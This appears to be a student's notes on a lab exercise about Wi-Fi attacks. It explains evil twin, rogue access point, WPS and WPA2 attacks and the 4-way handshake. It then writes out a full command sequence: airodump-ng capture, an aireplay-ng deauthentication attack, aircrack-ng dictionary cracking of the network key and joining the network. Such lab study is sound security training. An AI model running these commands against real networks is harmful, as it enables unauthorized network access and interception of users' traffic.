Task 17, Day 11 Wi-Fi attacks If you’d like to WPA, press the star key!

Attacks on Wi-Fi

For educational purposes only:

  • Evil twin attack: Fake access point with a similar name to a trusted network (i.e. “Home_Internnet” instead of “Home_Internet”). Attack starts by sending deauth packets to all the users on the legitimate AP. Frustration grows and users open the properties and see another network with the “right” name and stronger signal. They connect to the illegitimate network and their traffic is visible to the attacker.
  • Rogue access point: Similar to the evil twin attack, attaker sets up an open Wi-Fi AP near or inside an org’s physical premises so it has ideal signal strength. If users’ devices are set to auto-connect to open Wi-Fi, they may accidentally join the illegitimate network.
  • WPS attack: Wi-Fi Protected Setup (WPS) PINs are vulnerable in some networks due to insecure configuration. This attack initiates a handshake with the router and captures the response. This contains data related to the PIN and can be brute-forced into revealing the PIN and extracting the PSK.
  • WPA/WPA2 cracking: Security of the protocol is heavily influenced by the length and comlexity of the PSK. Cracking WPA starts with sending deauth packets to a legitimate user and capturing the 4-way handshake as the user reconnects. After the handshake is captured, the attacker can crack the password with brute-force or dictionary attacks against the captured handshake file.

The 4-way Handshake

Basic steps:

  • Router sends a challenge: The router/AP sends a “challenge” to the client asking it to prove it knows the network’s password without directly sharing it.
  • Client responds with encrypted info: Client uses the PSK to create an encrypted response that only the router can verify if it also has the correct PSK.
  • Router verifies and sends confirmation: If the client’s response matches what thr outer expects, the client’s PSK is correct and the router sends its own confirmation to the client.
  • Final check and connection established: Client verifies the router’s response, and if it matches, they finish setting up the secure connection.

The handshake doesn’t directly reveal the PSK, but involves encrypted messages that can only be understood with the same PSK.

The Vulnerability

Anyone can “hear” this conversation happening, and can use it as the basis to attempt offline brute-forcing or dictionary attacks. This involves trying different possible passwords and comparing the results to the captured handshake until the same result is achieved.

The Practical

In terminal:

  • iw dev to show any wireless devices available, and their configuration.
  • sudo iw dev wlan2 scan to use wlan2 to scan for available networks.
    • BSS(ID) can help identify the maker of the device, and SSID idicates it is sdvertising a network, so it is an AP of some sort.
    • RSN (Robust Security Network) is part of WPA2 standard, so network is using WPA2. This typically defines the encryption and authentication settings.
    • Group and Pairwise ciphers are CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol), the encryption method used by WPA2.
    • Authentication suites is PSK, indicating it is WPA2-Personal with a shared password for authentication.
    • DS Paarameter set is channel 6, showing it it 2.4GHz network.

Monitor mode on the wireless device allows it to listen to all traffic on a specific channel, whether directed at the device or not. Captures all traffic within range for analysis without ever joining network. To set device in monitoring mode:

  • sudo ip link set dev wlan2 down to turn off device.
  • sudo iw dev wlan2 set type monitor to set device to monitor mode.
  • sudo ip link set dev wlan2 up to turn device on.

Application

Using 2 terminals to observe capture and issue commands:

  • sudo airodump-ng wlan2 to start capturing traffic, specially targeting handshake packets (note: by default airodump-ng automatically switches the device into monitor mode if it’s available).
  • sudo airodump-ng -c 6 --bssid <MAC-address> -w output-file wlan2 to target a specific channel and MAC address, and save the captures to a few files that start with “output-file”.
    • STATION shows the BSSID of the connected device.
    • sudo aireplay-ng -0 1 -a <AP-MAC-address> -c <Station-MAC-address> wlan2 to start deauth attack.
    • -0 to specify deauth attack, 1 to specify sending 1 deauth.
    • -a BSSID of AP.
    • -c BSSID of the client to deauth. Success is shown when WPA handshake shows in top right corner. Can then move on to cracking the PSK by using aircrack-ng:
  • sudo aircrack-ng -a 2 -b <AP-MAC-address> -w </path/to/wordlist.txt> output*cap where:
    • -a 2 indicates WPA/WPA2 attack mode.
    • -b indicates AP MAC address.
    • -w indicates the dictionary list to use.
    • output*cap name of the output files to run the attack against. Once PSK is cracked, can use it to join the network, after turning off airodump-ng. Can’t join a network if the device is in monitor mode. Can join the wireless network with: 
      :~$ wpa_passphrase <SSID> '<PSK-HERE>' > config
:~$ sudo wpa_supplicant -B -c config -i wlan2

The Task

Retrieve SSID, BSSID, and PSK info.

Networking module